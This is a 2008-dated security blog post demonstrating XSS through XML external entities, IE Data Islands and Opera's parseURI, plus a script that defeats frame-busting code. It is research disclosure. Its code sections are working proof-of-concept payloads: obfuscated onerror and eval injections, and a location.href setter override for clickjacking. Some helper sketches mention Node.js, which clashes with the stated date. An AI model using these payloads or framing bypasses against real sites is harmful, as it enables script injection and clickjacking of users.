November 07, 2008

Fun with XXE, Data Islands and parseURI

Intro

Since the browser that changed it all was released in early 1999, most of the major players in this sector have been toying around with XML: processing, displaying and transforming it. As a result, most browsers know one or more ways to fetch data from other resources and to work with DTDs and entities. Some of these are shown and explained in this article.

Code

Firefox and all other major browsers except IE implement an XML feature called XXE - XML eXternal Entities. Securiteam wrote about this issue many years ago, and it found a kind of resurrection in the Google Caja Wiki. Basically, XXE means it is possible to define entities for complete strings and markup snippets in the DOCTYPE declaration at the top of the document.

<!DOCTYPE xss
[
<!ENTITY x "<script>alert(this)</script>">
]
>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
&x;
</head>
</html>

Unfortunately it doesn't seem to be possible for embedded frames or IFrames to inherit the entities from the embedding site. Otherwise it would have been possible to inject tons of script code with just a combination of &, some word characters and a semicolon.
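To make the substitution step concrete, here is a minimal sketch that mimics internal entity expansion on a string. It is a toy model and not a real XML parser; the helper name expandEntities and the regular expressions are assumptions made purely for illustration.

```javascript
// Toy model of internal entity expansion; NOT a real XML parser.
// expandEntities is a hypothetical helper written for this illustration.
function expandEntities(source) {
  const entities = {};
  // Collect declarations of the form <!ENTITY name "value">
  const declaration = /<!ENTITY\s+(\w+)\s+"([^"]*)"\s*>/g;
  let match;
  while ((match = declaration.exec(source)) !== null) {
    entities[match[1]] = match[2];
  }
  // Drop the DOCTYPE together with its internal subset ...
  const body = source.replace(/<!DOCTYPE[^\[]*\[[\s\S]*?\]\s*>/, '');
  // ... and substitute every known &name; reference, leaving unknown ones alone.
  return body.replace(/&(\w+);/g, function (ref, name) {
    return Object.prototype.hasOwnProperty.call(entities, name)
      ? entities[name]
      : ref;
  });
}

const entityDoc = [
  '<!DOCTYPE xss [',
  '<!ENTITY x "<script>alert(this)</script>">',
  ']>',
  '<html xmlns="http://www.w3.org/1999/xhtml"><head>&x;</head></html>'
].join('\n');

// The four characters "&x;" in the head are replaced by the full script element.
console.log(expandEntities(entityDoc));
```

The point of the sketch is only the size difference between the reference and what it expands to.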

Internet Explorer makes up for its lack of XXE support with a feature called Data Islands. This allows adding an XML tag to the document that links to a resource containing valid XML. If the parser later finds certain attributes in the DOM (datasrc and datafld in the example below), the data from the XML is checked for a match and, if everything fits, applied to the markup.

There are some basic security rules that forbid applying data from the XML file to a script tag and that escape certain special characters before they are placed in the DOM - but these can be easily circumvented.

<html>
<body>
<xml id="xss" src="island.xml"></xml>
<label
onmouseover=eval(this.innerHTML)
style=color:#fff;display:block;width:100%;height:100%
datasrc=#xss
datafld=payload></label>
</body>
</html>

Here we can see the corresponding XML data with embedded JavaScript code. Surprisingly, this time IE had problems parsing the data when it was encoded as UTF-7 - we only managed to get the script code executed with ISO or UTF-8 encoding.

<?xml version="1.0"?>
<x>
<payload>
document.write(
String.fromCharCode(
60,105,109,103,32,115,114,99,61,120,32,111,110,
101,114,114,111,114,61,97,108,101,114,116,40,34,
88,83,83,34,41,62
)
)
</payload>
</x>
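The character codes in the payload are easier to judge once decoded. The following sketch decodes the list from the XML above and shows how such a list can be produced; toCharCodes is a hypothetical helper name, not something used in the original example.

```javascript
// Character codes copied from the <payload> element above.
const payloadCodes = [
  60, 105, 109, 103, 32, 115, 114, 99, 61, 120, 32, 111, 110,
  101, 114, 114, 111, 114, 61, 97, 108, 101, 114, 116, 40, 34,
  88, 83, 83, 34, 41, 62
];

// Decode the list into the markup that document.write() would emit.
const decodedPayload = String.fromCharCode.apply(null, payloadCodes);
console.log(decodedPayload); // <img src=x onerror=alert("XSS")>

// Hypothetical helper: turn a string into a list of UTF-16 code units
// suitable for String.fromCharCode().
function toCharCodes(text) {
  return text.split('').map(function (ch) {
    return ch.charCodeAt(0);
  });
}

console.log(toCharCodes('XSS').join(',')); // 88,83,83
```

So the payload writes an img tag with a broken source, and the error handler carries the actual script.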

When using the dataformatas attribute it's even possible to have the incoming XML data treated as HTML. IE8 won't allow script tags but can be fooled into executing JavaScript code via an img tag and its error handler. Here's the markup:

<html>
<body>
<xml id="xss" src="island.xml"></xml>
<label dataformatas="html" datasrc="#xss" datafld="payload"></label>
</body>
</html>

And the corresponding Data Island code:

<?xml version="1.0"?>
<x>
   <payload>
       <![CDATA[<img src=x onerror=alert(top)>]]>
   </payload>
</x>

Opera knows XXE, as do Safari and Chrome - but of course no Data Islands. Opera does, however, feature another way of fetching XML content into the DOM. The function is called parseURI and is a method of the LSParser interface; an LSParser is created via the document.implementation object. All these features are documented in the DOM Level 3 Load and Save specification.

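<script>
// 1 = MODE_SYNCHRONOUS, null = no schema type
var parser = document.implementation.createLSParser(1, null);
// parseURI returns the parsed document; here the XML comes from a data: URI
var mdlfile = parser.parseURI('data:;,<x>document.write(String.fromCharCode(88,83,83))</x>');
// evaluate the text content of the root element <x>
eval(mdlfile.documentElement.text);
</script>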

The method can access neither off-domain resources nor the file system, and neither opera: nor javascript: URIs. But data: URIs are allowed, and thus the content of the string to parse can be chosen quite arbitrarily. Of course this time one can go all the way and encode the string as UTF-7, base64 or whatever is necessary.
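As a rough sketch of the base64 variant, the following builds a base64-encoded data: URI from the XML string used in the parseURI example. The helper name toBase64DataUri and the media type text/xml are assumptions for illustration (the original example leaves the media type empty), and whether a given parser accepts this exact form has not been verified here.

```javascript
// Hypothetical helper: wrap an XML string in a base64 data: URI.
// Only safe for Latin-1 input, which covers the ASCII payload used here.
function toBase64DataUri(xml, mediaType) {
  const base64 = typeof btoa === 'function'
    ? btoa(xml)                                       // browsers, newer Node.js
    : Buffer.from(xml, 'latin1').toString('base64');  // older Node.js
  return 'data:' + mediaType + ';base64,' + base64;
}

// Same XML as in the parseURI example above.
const islandXml = '<x>document.write(String.fromCharCode(88,83,83))</x>';

// Assumption: text/xml as media type.
const islandUri = toBase64DataUri(islandXml, 'text/xml');
console.log(islandUri);
```

The resulting string no longer contains any angle brackets or recognizable script code, which is what makes the payload hard to spot.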

Conclusion

One might wonder why each and every browser vendor is brewing its own sub-standards and XML soups. Every solution has its flaws, but none besides Opera allows including data that is not located on the same domain. Once parseURI can be executed in combination with a data: URI the possibilities are endless - and it's very hard to determine the origin and content of the payload. For all the other variants described, one has to have at least an XML file lying around on the same domain.

It's 2008 right now and browser vendors seem to have learned what the cross-domain border is. None of the techniques was able to download content from off-domain resources - except the data: URI issue with parseURI and Opera. Opera, by the way, features a lot more methods and properties inside the document.implementation object, which we will shed more light on in later articles.

Frame-Buster-Buster

Intro

Frame busters are great little helpers that make sure that an application's view can't be framed. Most of the time they consist of a very simple check whether self is strictly equal to top. If this is not the case, top.location is set to self.location. Pretty easy. But what possibilities are there to circumvent this technique?

top!==self?top.location.href=self.location.href:false;
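The one-liner above can be unpacked into a small function to make the logic explicit. This is only a sketch: bustFrame is a hypothetical name, and the window objects are plain mock objects with made-up example URLs so that the snippet also runs outside a browser.

```javascript
// Hypothetical wrapper around the frame buster one-liner.
// Returns true when it tried to break out of a frame.
function bustFrame(win) {
  if (win.top !== win.self) {
    // Framed: replace the outer page with our own address.
    win.top.location.href = win.self.location.href;
    return true;
  }
  return false;
}

// Mock objects standing in for real windows (assumption: example URLs).
const outerWindow = { location: { href: 'http://attacker.example/' } };
outerWindow.top = outerWindow;
outerWindow.self = outerWindow;

const framedWindow = {
  location: { href: 'http://victim.example/app' },
  top: outerWindow
};
framedWindow.self = framedWindow;

console.log(bustFrame(framedWindow));   // true
console.log(outerWindow.location.href); // http://victim.example/app
console.log(bustFrame(outerWindow));    // false
```

Everything hinges on the assignment to top.location.href actually taking effect, which is exactly the step an attacker tries to neutralize.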

Some code

The only browser that is really easy to trick into executing code that disables frame busters is Chrome - latest release. Since WebKit supports magic setter methods like __defineSetter__, it's possible to overwrite the location.href setter. Firefox doesn't allow that anymore - but can be tamed with the help of event handlers: the page can't be left unless the user has confirmed that action at least twice.

<html>
<head>
<script>
  try {
      location.__defineSetter__('href', function() {return false});
  } catch(e) {
      justFalse = function() {
          return false;
      }
      onbeforeunload = justFalse;
      onunload = location.href = location.href;
  }
</script>
</head>
<body>
<iframe src="framed.html"></iframe>
</body>
</html>
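The effect of the overwritten setter can be reproduced on a plain object, without a browser. In this sketch fakeLocation is a stand-in for the framing page's location object and the URLs are made up; unlike the example above, a getter is added as well so that reads keep returning the old value. That getter is an addition for illustration only.

```javascript
// Plain object standing in for the framing page's location (not a real Location).
const fakeLocation = { href: 'http://attacker.example/frame.html' };
const blockedNavigations = [];
const originalHref = fakeLocation.href;

// Keep reads working (added for illustration; the original only defines a setter).
fakeLocation.__defineGetter__('href', function () {
  return originalHref;
});

// Swallow every write instead of navigating.
fakeLocation.__defineSetter__('href', function (value) {
  blockedNavigations.push(value);
});

// What the framed page's frame buster would effectively attempt:
fakeLocation.href = 'http://victim.example/app';

console.log(fakeLocation.href);         // http://attacker.example/frame.html
console.log(blockedNavigations.length); // 1
```

The assignment succeeds silently from the frame buster's point of view, yet the address never changes.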

Conclusion

IE and Opera have done their job - this technique cannot be used to disable frame busters on framed sites. Thanks to the recently created FUD wave these topics have been resurrected and become interesting again. It's reminiscent of AJAX and JavaScript.